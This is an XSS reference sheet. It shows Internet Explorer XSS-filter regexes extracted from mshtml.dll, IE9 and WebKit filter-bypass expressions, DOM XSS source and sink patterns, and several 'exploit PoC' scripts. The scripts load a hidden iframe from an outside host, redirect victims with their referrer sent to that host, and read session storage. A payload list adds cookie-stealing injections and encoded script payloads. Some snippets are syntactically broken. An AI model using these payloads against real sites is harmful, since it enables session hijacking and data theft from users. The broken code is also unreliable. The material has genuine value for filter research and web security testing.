Document Summary: MSHTML.DLL XSS Filter Information on XSS.CX
Keyword: XSS, Reflected Cross Site Scripting, DOM-based XSS, CWE-79, CAPEC-86, DORK, GHDB, BHDB, REGEXP, XSSAdmin, XSS Filter, WebKit, Internet Explorer
Credits: Kusa55, #thornmaker, DRoss, Colin Jackson, Stefano Di Paola, Mario Heiderich, Gareth Heyes, Sirdarkcat, Kotowicz, RSnake, Giorgio Maone, sqlhacker, Ferruh Mavituna, Mark Flores Martin, others.....
Blog Post URL: http://www.cloudscan.me/2011/09/mshtmldll-ie-xss-filter-evasion.html
Note: Cumulative URL for IE XSS regex patterns, Sources, Sinks and URL Links
======================================================
Updated: May 21, 2013 - Added IE10 regexp
======================================================
Extract the REGEX from MSHTML.DLL
======================================================
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
======================================================
IE9 Summary - 23 Hardcoded Regex in mshtml.dll
======================================================
Fixed strings (2) javascript:, vbscript:
HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form
HTML attributes (3) " datasrc, " style=, " on*= (event handlers)
JavaScript strings (4) ";location=, ";a.b=, ");a(, ";a(b)
======================================================
IE XSS REGEX RESULTS (As of 09/2011) for IE9
======================================================
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}
{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}
{.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))}
{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))}
{]}
{}
{}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))({m}|(\\u00{6}D))(e|(\\u0065)))).*?=}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
======================================================
IE XSS REGEX RESULTS (As of 05/2013) for IE10
======================================================
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{]}
{.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))}
{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))}
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(
{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&(([#()\[\].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&(([#()\[\].]x?0*(9|(13)
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065)
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}
{}
{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{}
{]}
{}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065))(O|(\\u004[Ff]))(f|(\\u0066)))).*?=}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\x53))[^a-z0-9]*(t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*(r|(\\u0072)|(\\162)|(\\x72))[^a-z0-9]*(i|(\\u0069)|(\\151)|(\\x69))[^a-z0-9]*(n|(\\u006E)|(\\156)|(\\x6E))[^a-z0-9]*(g|(\\u0067)|(\\147)|(\\x67)))).*?:}
{]}
{[ /+\t\"\'`]data{s}rc[ +\t]*?=.}
{]}
{}
{.*?((@[i\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))))}
{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))}
======================================================
Overview - Rules Example
============================================
Craft a URL
============================================
HTTP GET http://victim.fqdn/?xss=
============================================
============================================
IE9 Filters to Neuter =
============================================
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))(c|(\\u0063))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))(m|(\\u006D))(e|(\\u0065)))).*?{=}
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(([.].+?)|([\[].*?[\]].*?)){=}
============================================
IE9 Filter Bypass #1
============================================
Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(location).*?=
Bypass Expression = "+{valueOf:location, toString: [].join,0:'jav\x61script:alert\x280)',length:1}//
location("http://xss.cx/");
============================================
IE9 Filter Bypass #2
============================================
Regex = {[\\\"\\'][ ]*(([^a-z~_:\\'\\\" 0-9])|(in)).+?{\\(}.*?{\\)}}
Bypass Expression = foo='&js_xss=";alert(0)//
Bypass Expression = ",alert(0)//
Bypass Expression = foo=
============================================
IE9 Filter Bypass #3
============================================
Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(({[.]}.+?)|({[\[]}.*?{[\]]}.*?))=
Bypass Expression = ";x:[document.URL='jav\x61script:alert\x280)']//
Bypass Expression = ”>link
============================================
WebKit XSSAdmin Filter Bypass #1
============================================
">
"-prompt(document.location)-"
============================================
XSS Admin, WebKit Filter Bypass #1
============================================
Referer: http://www.google.com/search?hl=en&q=xss">
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)xss">
Example PoC Report URL http://xss.cx/2011/06/29/ghdb/dork-xss-reflected-cross-site-scripting-javascript-injection-rest-url-parameter-user-agent-referer-cwe79-capec86-example-poc-report-wwwbankofamericacom.html#1.28
============================================
DOM-based XSS - Sources and Sinks
============================================
Find Sources:
/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/
============================================
Find Sinks:
/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/
============================================
XSS.CX Low Hanging Fruit Examples, PoC, XSS, Expression, DOM-DORK
============================================
Array = (function(orig){
var f = function() {
alert('DOH');
return orig.apply(this, arguments);
}
f.prototype = orig.prototype;
return f;
})(Array);
------------------------------------------------
eval(unescape(location.href))
------------------------------------------------
onreadystatechange=eval(unescape(location.href))
------------------------------------------------
?name=xss#
------------------------------------------------
document.write("XSS");
------------------------------------------------
#%0Afunction%20DOH%28%29{alert%28%27DOH%27%29%3B}
DOH();
============================================
Example FrameBuster JS - From bankofamerica.com
============================================
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
============================================
XSS Exploit PoC #1 - iFramer
============================================
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://xss.cx/xss.js');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
============================================
XSS Exploit PoC #2
============================================
function cx () {
try {
for (var i = 0; i < navigator.plugins.length; i++) {
if {name.indexOf("Media Player") != -1) {
var m = document.create.Element("iframe");
m.setAttribute("src", http://xss.cx/xss.js:);
m.setAttribute("width", 0);
m.setAttribute("height", 0);
m.setAttribute("frameborder", 0);
document.body.appendChild(m);
}
} catch (e) {
}
cx();
============================================
XSS Exploit PoC #3
============================================
var url = "htpp://xss.cx/default.aspx?xss="+encodeURIComponent(document.referrer)";
if (window!=top) {top.location.href = url;} else document.location= url;
============================================
XSS Exploit PoC #4 - Get Local Storage Values
============================================
var ss = ""; for(i = 0; i < window.sessionStorage.length; i++) ss += window.sessionStorage.key(i) + ":" + sessionStorage.getItem(sessionStorage.key(i)) + " ";
============================================
IE9 Q4/2011 Server-encoded PoC XSS Filter Bypass
============================================
%2527%253e%253cScRiPt%253ealert%2528document.location%2529%253c%252fScRiPt%253e
============================================
Some Examples (These are from the URL's listed below)
============================================
http://somesite/test.asp?param=click to continue
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//
"+document.cookie+"
- Conducting variable assignments to sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work)
";escape=eval;//
Examples below from Michael Coates on XSS to steal session ID from local storage
Proof of concept XSS with local storage:
Get a Local Storage Value via URL scriptlet
javascript:alert(localStorage.getItem('fooName'));
Set a Local Storage Value via URL scriptlet:
javascript:localStorage.setItem('fooName','barValue');
Set a Local Storage Value with JSON via URL scriptlet:
javascript:localStorage.setItem('fooName', JSON.stringify('data1:a,"data2":b,data3:c'));
Get Number of Local Storage Objects via URL scriptlet:
javascript:alert(localStorage.length);
Clearing all Local Storage associated with site:
javascript:localStorage.clear()
============================================
Suggested Reading
============================================
http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf
http://www.collinjackson.com/research/xssauditor.pdf
https://www.owasp.org/index.php/DOM_Based_XSS
https://code.google.com/p/domxsswiki/wiki/Index
http://www.webappsec.org/projects/articles/071105.shtml
http://code.google.com/p/urlparsing/
http://kotowicz.net/absolute/
http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
============================================================
Credits
============================================================
Kusa55, #thornmaker, DRoss, Colin Jackson, Stefano Di Paola, Michael Coates, Mario Heiderich, Gareth Heyes, Sirdarkcat, Kotowicz, RSnake, Giorgio Maone, sqlhacker, Ferruh Mavituna, Mark Flores Martin, many others...
=============================================================
Keywords: XSS, Reflected Cross Site Scripting, DOM-based XSS, CWE-79, CAPEC-86, DORK, GHDB, BHDB, REGEXP, XSSAdmin, XSS Filter, WebKit, Internet Explorer
=============================================================
============================================
===========================================
==========================================
XSS.CX Publication Date 9/01/2011